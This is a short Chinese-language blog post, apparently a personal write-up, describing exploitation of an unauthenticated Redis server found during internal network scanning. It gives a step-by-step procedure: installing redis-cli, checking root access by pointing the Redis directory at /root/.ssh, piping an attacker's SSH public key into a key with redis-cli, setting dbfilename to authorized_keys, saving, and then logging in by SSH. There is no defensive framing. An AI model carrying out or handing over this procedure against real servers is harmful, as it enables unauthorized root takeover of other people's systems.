redis未授权访问利用

在内网里面扫描，扫到一台redis未授权访问的服务器，这个网段是对外的网站服务器所在的网段，之前一直没有进去，这次比较巧合。

网上讲这个的文章很多，这里等于是实际操作了一遍。

首先在自己的服务器上安装redis。

wget http://download.redis.io/releases/redis-4.0.1.tar.gz 这里我下得版本比较老，问题不大

tar xzf redis-4.0.1.tar.gz 解压

cd redis-4.0.1

make

make install

安装完成以后

测试下 redis命令能否使用

直接能连接上。如果这时候要直接写ssh公钥就必须是root权限

怎么确定是root？

查看能否将备份路径设置为/root/.ssh

这样就是可以确定这是root权限我们可以通过写入公钥来拿下服务器。

原理是通过修改数据库的默认路径为/root/.ssh/和默认的缓冲文件authorized_keys，把缓冲数据保存在该文件中，这样就可以生成一个授权的key。

然后先在自己的机器上生成公钥

然后利用命令生成一个文本，将公钥文件中的内容写入其中。

cat /root/.ssh/key.txt | redis-cli -h xxxxxxxxx -p 6379 -xset aa

将文件写入目标主机的缓冲文件

通过get aaa查看缓冲内容

不要忘了改缓冲文件的名字， config set dbfilename authorized_keys

最后save 退出

在自己的机器上ssh连接即可